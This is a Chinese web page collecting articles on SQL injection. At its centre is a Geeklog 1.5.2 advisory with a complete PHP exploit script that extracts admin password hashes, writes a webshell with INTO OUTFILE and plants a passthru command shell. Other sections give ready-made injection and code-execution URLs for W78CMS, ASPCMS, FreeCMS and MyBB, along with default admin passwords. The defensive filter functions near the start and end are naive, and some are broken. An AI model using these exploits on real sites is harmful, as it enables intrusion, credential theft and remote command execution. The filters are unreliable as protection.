当前位置：首页 > 实用文档 > 其他范文> Geeklog SECauthenticate函数SQL注入漏洞

Geeklog SECauthenticate函数SQL注入漏洞

时间：2022-12-16 07:37:28 其他范文收藏本文下载本文

Geeklog SECauthenticate函数SQL注入漏洞（共10篇）由网友“你要每天开心”投稿提供，下面小编为大家整理后的Geeklog SECauthenticate函数SQL注入漏洞，希望能帮助大家!

篇1：预防SQL注入漏洞函数

仅仅代表我的观点.不怕见笑.有问题请大家指教！我想如果你是牛人，那这个已经不是值得你看的内容，只是觉得对与很多刚入门的ASP程序员来说还是有点实际意义，所以不怕被大家笑话，写了贴在这里！

Function checkStr（str）

if isnull（str） then

checkStr = ““

exit function

end if

checkStr=replace（str，” “，”“）

checkStr=replace（str，”'“，”'“）

checkStr=replace（str，”；“，”'“）

checkStr=replace（str，”--“，”'“）

checkStr=replace（str，”（“，”'“）

checkStr=replace（str，”[“，”'“）

checkStr=replace（str，”$“，”'“）

end function

篇2：Geeklog SECauthenticate函数SQL注入漏洞

影响版本:

geeklog <= 1.5.2

漏洞描述:

Geeklog是一个免费的、开放源码的Web应用程序，它可以使用户创建一个虚拟的社区，可以管理用户，张贴文章等。Geeklog采用PHP实现，以MySQL为后台数据库。

Geeklog的index.php模块中的SEC_authenticate函数没有正确的验证用户所提交的PHP_AUTH_USER和 REMOTE_USER变量参数，远程攻击者可以通过提交恶意查询请求执行SQL注入攻击。以下是/public_html/webservices /atom/index.php文件中34-53行的有漏洞代码段：

...

require_once '../../lib-common.php';

if (PHP_VERSION < 5) {

$_CONF['disable_webservices'] = true;

} else {

require_once $_CONF['path_system'] . '/lib-webservices.php';

}

if ($_CONF['disable_webservices']) {

COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');

}

header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8');

WS_authenticate();

...

/system/lib-webservices.php文件780-877行的WS_authenticate()函数：

...

function WS_authenticate()

{

global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;

$uid = '';

$username = '';

$password = '';

$status = -1;

if (isset($_SERVER['PHP_AUTH_USER'])) {

$username = $_SERVER['PHP_AUTH_USER'];

$password = $_SERVER['PHP_AUTH_PW'];

if ($WS_VERBOSE) {

COM_errorLog(“WS: Attempting to log in user '$username'”);

}

} elseif (!empty($_SERVER['REMOTE_USER'])) {

list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']);

list($username, $password) = explode(':', base64_decode($auth_data));

if ($WS_VERBOSE) {

COM_errorLog(“WS: Attempting to log in user '$username' (via \$_SERVER['REMOTE_USER'])”); }

} else {

if ($WS_VERBOSE) {

COM_errorLog(“WS: No login given”);

}

...

之后在907-909行：

...

if (($status == -1) && $_CONF['user_login_method']['standard']) {

$status = SEC_authenticate($username, $password, $uid);

}

...

/system/lib-security.php文件的695-717行：

...

function SEC_authenticate($username, $password, &$uid)

{

global $_CONF, $_TABLES, $LANG01;

$result = DB_query(“SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))”); //<------------------- SQL INJECTION HERE

$tmp = DB_error();

$nrows = DB_numRows($result);

if (($tmp == 0) && ($nrows == 1)) {

$U = DB_fetchArray($result);

$uid = $U['uid'];

if ($U['status'] == USER_ACCOUNT_DISABLED) {

// banned, jump to here to save an md5 calc.

return USER_ACCOUNT_DISABLED;

} elseif ($U['passwd'] != SEC_encryptPassword($password)) {

return -1; // failed login

} elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {

return USER_ACCOUNT_AWAITING_APPROVAL;

} elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {

// Awaiting user activation, activate:

DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE,

'username', $username);

return USER_ACCOUNT_ACTIVE;

} else {

return $U['status']; // just return their status

}

} else {

$tmp = $LANG01[32] . “: '” . $username . “'”;

COM_errorLog($tmp, 1);

return -1;

}

...

可在这个函数的username参数中注入SQL代码，该参数来自$_SERVER['PHP_AUTH_USER']或$_SERVER['REMOTE_USER']变量。

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

$err[0] = “[!] This script. is intended to be launched from the cli!”;

$err[1] = “[!] You need the curl extesion loaded!”;

if (php_sapi_name() “cli”) {

die($err[0]);

}

if (!extension_loaded('curl')) {

$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :

false;

if ($win) {

!dl(“php_curl.dll”) ? die($err[1]) :

nil;

} else {

!dl(“php_curl.so”) ? die($err[1]) :

nil;

}

function syntax() {

print (

“Syntax: php ”.$argv[0].“ [host] [path] [OPTIONS] \n”. “Options: \

\n”. “--port:[port] - specify a port \

\n”. “ default->80 \

\n”. “--prefix - try to extract table prefix from information.schema \

\n”. “ default->gl_ \

\n”. “--uid:[n] - specify an uid other than default (2,usually admin) \

\n”. “--proxy:[host:port] - use proxy \

\n”. “--skiptest - skip preliminary tests \

\n”. “--test - run only tests \

\n”. “--export_shell:[path] - try to export a shell with INTO OUTFILE, needs \

Mysql\n”. “ FILE privilege \

\n”. “--sp - submit a 'staticpage' with php code, needs geeklog \

\n”. “ sp_php permission set to true for thestaticpage \

\n”. “ plugin (not the default) \

\n”. “Examples: php ”.$argv[0].“ 192.168.0.1 /geeklog/ \

\n”. “ php ”.$argv[0].“ 192.168.0.1 / --prefix --proxy:1.1.1.1:8080 \

\n”. “ php ”.$argv[0].“ 192.168.0.1 / --prefix \

--export_shell:/var/www\n”. “ php ”.$argv[0].“ 192.168.0.1 / --prefix \

--uid:3”); die();

}

error_reporting(E_ALL ^ E_NOTICE);

$host = $argv[1];

$path = $argv[2];

$prefix = “gl_”;

//default

$uid = “2”;

$where = “uid=$uid”;

$argv[2] ? print(“[*] Attacking...\n”) :

syntax();

$_f_prefix = false;

$_use_proxy = false;

$port = 80;

$_skiptest = false;

$_verbose = false;

$_test = false;

$sp_submit = false;

$into_outfile = false;

for ($i = 3; $i < $argc; $i++) {

if (stristr($argv[$i], “--prefix”)) {

$_f_prefix = true;

}

if (stristr($argv[$i], “--proxy:”)) {

$_use_proxy = true;

$tmp = explode(“:”, $argv[$i]);

$proxy_host = $tmp[1];

$proxy_port = (int)$tmp[2];

}

if (stristr($argv[$i], “--port:”)) {

$tmp = explode(“:”, $argv[$i]);

$port = (int)$tmp[1];

}

if (stristr($argv[$i], “--uid”)) {

$tmp = explode(“:”, $argv[$i]);

$uid = (int)$tmp[1];

$where = “uid=$uid”;

}

if (stristr($argv[$i], “--verbose”)) {

$_verbose = true;

}

if (stristr($argv[$i], “--skiptest”)) {

$_skiptest = true;

}

if (stristr($argv[$i], “--test”)) {

$_test = true;

}

if (stristr($argv[$i], “--export_shell:”)) {

$tmp = explode(“:”, $argv[$i]);

$my_path = $tmp[1];

$into_outfile = true;

}

if (stristr($argv[$i], “--sp”)) {

$sp_submit = true;

}

function _s($url, $auth, $is_post, $request) {

global $_use_proxy, $proxy_host, $proxy_port;

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

if ($is_post) {

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, $request.“\r\n”);

}

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows; U; Windows NT 5.1; \

it; rv:1.9.0.7) Gecko/021910 Firefox/3.0.7”); curl_setopt($ch, CURLOPT_TIMEOUT, \

0);

if ($auth “”) {

$auth = array(“Authorization: Basic ”.$auth);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_HTTPHEADER, $auth);

}

if ($_use_proxy) {

curl_setopt($ch, CURLOPT_PROXY, $proxy_host.“:”.$proxy_port);

}

$_d = curl_exec($ch);

if (curl_errno($ch)) {

die(“[!] ”.curl_error($ch).“\n”);

} else {

curl_close($ch);

}

return $_d;

}

function find_prefix() {

global $host, $port, $path, $uid, $pwd, $url;

$_tn = “TABLE_NAME”;

$_ift = “information_schema.TABLES”;

$_table_prefix = “”;

$j = -15;

$usr = “' AND 0 UNION SELECT null,null,null,null FROM $_ift WHERE ”.$_tn.“ \

LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*”; $_o = _s($url, \

base64_encode($usr.“:”.$pwd) , 0, “”); if (chk_err($_o)) {

die(“[!] $_ift not availiable.”);

} else {

print “[*] Initiating table prefix extraction...\n”;

}

while (!$null_f) {

$mn = 0x00;

$mx = 0xff;

while (1) {

if (($mx + $mn) % 2 == 1) {

$c = round(($mx + $mn) / 2) - 1;

} else {

$c = round(($mx + $mn) / 2);

}

$usr = “' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN \

(ASCII(SUBSTR(”.$_tn.“ FROM $j FOR 1)) >= ”.$c.“) THEN '' ELSE $uid END) FROM $_ift \

WHERE ”.$_tn.“ LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*”; $_o = _s($url, \

base64_encode($usr.“:”.$pwd) , 0, “”);

if (chk_err($_o)) {

$mn = $c;

} else {

$mx = $c - 1;

}

if (($mx-$mn == 1) or ($mx == $mn)) {

$usr = “' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN \

(ASCII(SUBSTR(”.$_tn.“ FROM $j FOR 1)) >= ”.$c.“) THEN '' ELSE $uid END) FROM $_ift \

WHERE ”.$_tn.“ LIKE 0x25747261636b6261636b636f646573 LIMIT 1/*”; $_o = _s($url, \

base64_encode($usr.“:”.$pwd) , 0, “”); if (chk_err($_o)) {

if ($mn 0) {

$_table_prefix = chr($mn).$_table_prefix;

} else {

$null_f = true;

}

} else {

if ($mx 0) {

$_table_prefix = chr($mx).$_table_prefix;

} else {

$null_f = true;

}

if (!$null_f) {

print (“[?] Table prefix->[??]”.$_table_prefix.“\n”);

}

break;

}

$j--;

}

print “[?] Table prefix->”.$_table_prefix.“\n”;

return $_table_prefix;

}

function export_sh() {

global $pwd, $url, $prefix, $my_path;

$usr = “' AND 0 UNION SELECT null,'

INTO OUTFILE '”.$my_path.“/sh.php' FROM ”.$prefix.“users LIMIT 1/*”; $_o = _s($url, \

base64_encode($usr.“:”.$pwd) , 0, “”); if (chk_err($_o)) {

print (“[*] Sql error.”);

} else {

print (“[*] Done.”);

}

function sp_php() {

global $host, $port, $path, $pwd, $prefix, $uid;

srand(make_seed());

$id = rand(0x1, 0xffffff);

echo “[*] id->”.$id.“\n”;

$sh = “passthru(\$_GET[cmd]);”;

//always specify the namespaceuri

//if the staticpages.PHP permission is not avaliable, sp_php will be resetted \

to 0 $data = “”. “

xmlns=\”\x20\x20\x20\x20www.geeklog.net/xmlns/app/gl\“>\x20\x20\x20\x20”. “

xmlns=\”$id

www.geeklog.net/xmlns/app/gl\“>$id”. “

xmlns=\”$sh

www.geeklog.net/xmlns/app/gl\“>$sh”. “

xmlns=\”1

www.geeklog.net/xmlns/app/gl\“>1”. “

xmlns=\”1

www.geeklog.net/xmlns/app/gl\“>1”. “

”;

$usr = “' AND 0 UNION SELECT 3,MD5('AAAA'),null,$uid FROM ”.$prefix.“users \

LIMIT 1/*”;

$url = “webservices/atom/index.php?plugin=staticpag'>$host:$port”.$path.“webservices/atom/index.php?plugin=staticpag \

es”; $out = _s($url, base64_encode($usr.“:”.$pwd) , 1, $data);

if (chk_err($_o)) {

print (“[*] Sql error.”);

} else {

print (“[*] Done! \

Visit->$host:$port”.$path.“staticpages/index.php?page=$id&cmd=ls%20-la”); }

}

function make_seed() {

list($usec, $sec) = explode(' ', microtime());

return (float) $sec + ((float) $usec * 100000);

}

function chk_err($s) {

if (stripos ($s, \

“\x41\x6e\x20\x53\x51\x4c\x20\x65\x72\x72\x6f\x72\x20\x68\x61\x73\x20\x6f\x63\x63\x75\ \

x72\x72\x65\x64\x2e”)) { return true;

} else {

return false;

}

$pwd = “AAAA”;

$url = “webservices/atom/index.php?plugin=staticpages'>$host:$port”.$path.“webservices/atom/index.php?plugin=staticpages”; \

if (!$_skiptest) {

$out = _s($url, base64_encode(“':'”) , 0, “”);

if (chk_err($out)) {

print(“[*] Vulnerable!\n”);

} else {

die(“[!] Not vulnerable.”);

}

if ($_test) {

die;

}

if ($_f_prefix == true) {

$prefix = find_prefix();

}

if ($into_outfile == true) {

export_sh();

die;

}

if ($sp_submit == true) {

sp_php();

die;

}

$c = array();

$c = array_merge($c, range(0x30, 0x39));

$c = array_merge($c, range(0x61, 0x66));

$_hash = “”;

print (“[*] Initiating hash extraction ...\n”);

for ($j = 1; $j < 0x21; $j++) {

for ($i = 0; $i <= 0xff; $i++) {

$f = false;

if (in_array($i, $c)) {

//uid is mediumint, so if you assign a string value to it you have an \

sql error, so the script. fails hence true/fails questions and you bypass speed limit \

also $usr = “' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(passwd \

FROM $j FOR 1))=$i) THEN '' ELSE $uid END) FROM ”.$prefix.“users WHERE $where LIMIT \

1/*”; $out = _s($url, base64_encode($usr.“:”.$pwd) , 0, “”);

if (chk_err($out)) {

$f = true;

$_hash .= chr($i);

print “[*] Md5 Hash: ”.$_hash.str_repeat(“?”, 0x20-$j).“\n”;

break;

}

if ($f == false) {

die(“\n[!] Unknown error ...”);

}

print “[*] Done! Cookie: geeklog=$uid; password=”.$_hash.“;\n”;

篇3：W78CMS SQL注入漏洞

W78企业ASP网站管理系统V1.1的SQL注入

程序发布日期:03月18日.

裸奔的系统，

1.shopmore.asp

set rs=server.createobject(“adodb.recordset”)

exec=“select * from [shop] where ssfl=”& request.QueryString(“id”) &“ order by id desc ”

rs.open exec,conn,1,1

if rs.eof then

response.Write “ 该分类暂无产品！”

else

rs.PageSize =20 '每页记录条数

iCount=rs.RecordCount '记录总数

iPageSize=rs.PageSize

maxpage=rs.PageCount

page=request(“page”)

if Not IsNumeric(page) or page=“” then

page=1

2.about.asp

exec=“select * from [about] where id=”& request.QueryString(“id”)

set rs=server.createobject(“adodb.recordset”)

rs.open exec,conn,1,1

3.search_news.asp

dim title

title=request.form(“form_news”)

set rs=conn.execute(“select * from [news] where title like '%”&title&“%'”)

if title=“” then

response.write (“”)

end if

if rs.eof then

response.write (“”)

还有其他的页面，

4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp

默认user:admin password:198625

不能进的还可以试试

后台默认密码为86779533 abc123这两个

试试数据库默认地址为/data/%23sze7xiaohu.mdb

exp：www.voicetune.com/about.asp?id=2%20and%201=2%20union%20select%201,admin,3,password,5,6%20from%20admin

www.voicetune.com/ShopMore.asp?id=13%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin

搜索型注入：%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='

Google:inurl:ShopMore.asp?id

篇4：终极防范SQL注入漏洞！

其实SQL注入漏洞并不可怕，知道原理＋耐心仔细，就可以彻底防范！下面给出4个函数，足够你抵挡一切SQL注入漏洞！读懂代码，你就能融会贯通，注意要对所有的request对象进行过滤：包括 request.cookie, request.ServerVariables 等等容易被忽视的对象：function killn(byval s1) '过滤数值型参数if not isnumeric(s1) then killn=0elseif s10 or s12147483647 then killn=0else killn=clng(s1)end ifend ifend functionfunction killc(byval s1) 过滤货币型参数if not isnumeric(s1) then killc=0else killc=formatnumber(s1,2,-1,0,0)end ifend functionfunction killw(byval s1) '过滤字符型参数if len(s1)=0 thenkillw=“”elsekillw=trim(replace(s1,“'”,“”))end ifend functionfunction killbad(byval s1) 过滤所有危险字符，包括跨站脚本If len(s1) = 0 thenkillbad=“”elsekillbad = trim(replace(replace(replace(replace(replace(replace(replace(replace(s1,Chr(10), “br”), Chr(34), “”“), ”“, ”gt;“), ”“, ”lt;“), ”“, ”“),chr(39),”#39“),chr(32),”“),chr(13),”“))end ifend function

篇5：ASPCMS2.38 SQL注入漏洞漏洞预警

ASPCMS系统对用户提交的参数过滤不严，导致攻击者可以提交SQL语句查询数据库获取敏感信息，

漏洞存在于/admin_aspcms/_content/_Content/AspCms_ContentFun.asp，这个文件未验证管理员权限，因此如何人都可以访问，同时该文件对获取的参数没有使用自定义的filterPara函数过滤，导致多处注入，代码入下：

<% ''die debugmode

dim action : action=getForm(”action“,”get“)

dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory

''SpecCategory用于判断是哪个类型的自定义参数

dim sortType, keyword, page, psize, order, ordsc, sortTypeName

sortType=getForm(”sortType“,”get“) if isnul(sortType) then sortType=0

sortid=getForm(”sortid“,”post“) if isnul(sortid) then sortid=getForm(”sortid“,”get“)

keyword=getForm(”keyword“,”post“) if isnul(keyword) then keyword=getForm(”keyword“,”get“)

page=getForm(”page“,”get“)

psize=getForm(”psize“,”get“)

rder=getForm(”order“,”get“)

rdsc=getForm(”ordsc“,”get“)

DownGroupID=getForm(”DownGroupID“,”post“)

VideoGroupID=getForm(”VideoGroupID“,”post“)

select case sortType

case ”2“

sortTypeName =”文章“

SpecCategory = ”C“ case ”3“

sortTypeName =”产品“

SpecCategory = ”P“ case ”4“

sortTypeName =”下载“

SpecCategory = ”DL“ case ”5“

sortTypeName =”招聘“

SpecCategory = ”HR“ case ”6“

sortTypeName =”相册“

SpecCategory = ”FO“ case ”8“

sortTypeName = ”视频“

SpecCategory = ”VI“ end select

''单篇1,文章2,产品3,下载4,招聘5,相册6,链接7，视频8

Select case action

case ”add“ : addContent

case ”edit“ : editContent

case ”move“ : moveContent

case ”copy“ : copyContent

case ”rpost“ : rpostContent

case ”del“ : delContent

case ”recovery“ : Recovery

case ”tdel“ : trueDelContent

case ”on“ : onOff ”on“, ”Content“, ”ContentID“, ”ContentStatus“, ”“, getPageName&”?sortType=“&sortType&”&sortid=“&sortid&”&keyword=“&keyword&”&page=“&page&”&psize=“&psize&”&order=“&order&”&ordsc=“&ordsc

case ”off“ : onOff ”off“, ”Content“, ”ContentID“, ”ContentStatus“, ”“, getPageName()&”?sortType=“&sortType&”&sortid=“&sortid&”&keyword=“&keyword&”&page=“&page&”&psize=“&psize&”&order=“&order&”&ordsc=“&ordsc

case ”order“ : UpdateOrder

End Select

Sub trueDelContent

dim id : id=getForm(”id“,”both“) if isnul(id) then alertMsgAndGo ”请选择要操作的内容“,”-1“ if runmode=1 then

dim rs, sql, filepath

dim templateobj : set templateobj=new TemplateClass

sql=”select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID=“&session(”languageID“)&” and a.SortID=b.SortID and ContentStatus=2 and ContentID in(“&id&”)“ set rs=conn.exec(sql,”r1“) do while not rs.eof

filepath=templateobj.getContentLink(rs(”SortID“),rs(”ContentID“),rs(”SortFolder“),rs(”a.GroupID“),rs(”ContentFolder“),

rs(”ContentFileName“),rs(”AddTime“),rs(”PageFileName“),rs(”b.GroupID“)) if isExistFile(filepath) then delFile filepath

''echo filepath&”

“

rs.movenext

loop

end if

conn.exec ”delete from {prefix}Content where ContentStatus=2 and ContentID in(“&id&”)“,”exe“

alertMsgAndGo ”彻底删除成功“,getPageName()&”?sortType=“&sortType&”&sortid=“&sortid&”&keyword=“&keyword&”&page=“&page&”&psize=“&psize&”&order=“&order&”&ordsc=“&ordsc

End Sub

利用比较简单，利用iif来强制报错：

www.xxx.com0/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))

查询管理员用户名第一个字符是否为a

www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))

查询管理员用户名第一个字符是否为b

返回为假，强制报错

篇6：FreeCMS index.php SQL注入漏洞

FreeCMS.us FreeCMS 0.2

描述:

BUGTRAQ ID: 29773

CNCAN ID：CNCAN-061903

FreeCMS是一款基于PHP的WEB应用程序，

FreeCMS不正确处理用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，可能获得敏感信息或操作数据库。

问题是'index.php'脚本对用户提交给'page'参数缺少过滤，构建恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。

<* 参考:

漏洞提供者

Mr.SQL

测试方法:

[警告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

www.example.com/index.php?page=-28+union+select+concat_ws(0x3a,admin,password)+from+admin/*

建议:

目前没有解决方案提供：

www.freecms.us/

本信息收集自 SEBUG Security Database

篇7：MyBB moderation.php SQL注入漏洞

style=”display:block;padding:0px 10px;“ class=”ContentFont“>MyBB是一款基于PHP的WEB应用程序，

MyBB不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB权限执行任意代码.

问题是由于'forumdisplay.php'和'search.php'脚本对用户提交的'fid'参数处理缺少充分过滤，提交恶意数据，在获得”sid“的情况下，可导致任意代码执行。

注入:

www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts&mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,7+UNION+ALL+SELECT+1,(SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27)+FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2

www.example.com/mybb.1.2.10/moderation.php?fid=2&action=allreports&rid=0'+UNION+SELECT+waraxe--+

www.example.com/mybb.1.2.10/moderation.php?fid=2&action=do_multimovethreads&moveto=2&threads=war|axe

多远程php代码执行:

www.example.com/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];phpinfo;exit;//

www.example.com/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];system('ls');exit;//

www.example.com/mybb.1.2.10/forumdisplay.php?fid=2&sortby='];readfile('inc/config.php');exit;//

www.example.com/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];phpinfo();exit;//

www.example.com/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];system('ls');exit;//

www.example.com/mybb.1.2.10/search.php?action=results&sid=[valid sid here]&sortby='];readfile('inc/config.php');exit;//

篇8：对SQL注入漏洞的防御

软件安全

对于一个网站来说，SQL注入漏洞的危害是巨大的，

由于问题出在代码上，所以最终还是要从程序代码上去解决。不过很多网站的站长对代码并不是很了解，他们只是从网络上下载一套系统来用而已，叫他们自己改代码似乎有点为难了。不过程序的开发人员会不定期地发布一些补丁，站长们可以通过勤打补丁来补上漏洞。

对于具有代码编写能力的人，对每一个从客户端接收来的数据都应该做好过滤才放到SQL语句里去执行。以前的普遍做法是一个一个地过滤有可能出现漏洞的参数，不过现在有人开发了一套SQL通用防注入系统。

其思路就是把提交到页面的所有数据都过滤一遍，其实SQL注入提交的数据都有一个特征，就是数据里会有SQL语句和一些SQL语言的关键字，比如“AND”、“UNION”、“SELECT”等字符串，只要在数据里存在这些字符串，就可以判定为SQL注入行为来处理，而不会把这个数据当成SQL语句去执行了。

以下是作者根据这个思路模仿SQL通用防注入系统编写的代码：

--------定义部分------------------

Dim FangZhuPost，FangZhuGet，FangZhuIn，FangZhuInf，FangZhuXh

注释：自定义需要过滤的字串，用“|”分隔，如果读者发现有什么遗漏可以加上去

|*|%|chr|mid|master|truncate|char|declare“

FangZhuInf = split(FangZhuIn，”|“) 注释：把非法字符串用“｜”分割出来

--------POST部分------------------

If Request.Form”“ Then

For Each FangZhuPost In Request.Form. 注释：循环取得提交的参数

For FangZhuXh=0 To Ubound(FangZhuInf) 注释：全部转换成大写

If Instr(LCase(Request.Form(FangZhuPost)),FangZhuInf(FangZhuXh))0 Then

注释：如果在数据里有非法字符串

Response.Write ”“

Response.End

End If

----------------------------------

--------GET部分-------------------

If Request.QueryString”“ Then

For Each FangZhuGet In Request.QueryString

For FangZhuXh=0 To Ubound(FangZhuInf)

If Instr(LCase(Request.QueryString(FangZhuGet)),FangZhuInf(FangZhuXh))0 Then

Response.Write ”“

Response.End

End If

把这些代码保存在一个asp文件里，比如fang.asp，并把这个fang.asp文件放在要防护的页面文件的目录下，

在要防护的页面开头加入一句

下载本文

【Geeklog SECauthenticate函数SQL注入漏洞（共10篇）】相关文章：

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警2022-05-31

如何防范网站数据库入侵2022-11-30

跨站脚本漏洞的利用教程2023-05-16

oblog?4.6?注入的语句2023-08-25

教你怎样学会SQL注入2022-05-06

LNK文件漏洞简要分析2023-01-25

闪存博客SQL注入脚本安全2023-09-01

Discuz XSS得webshell脚本安全2022-05-08

web安全学习之xss个人总结2023-02-14

帝国CMS 留言本多字节漏洞漏洞预警2023-04-15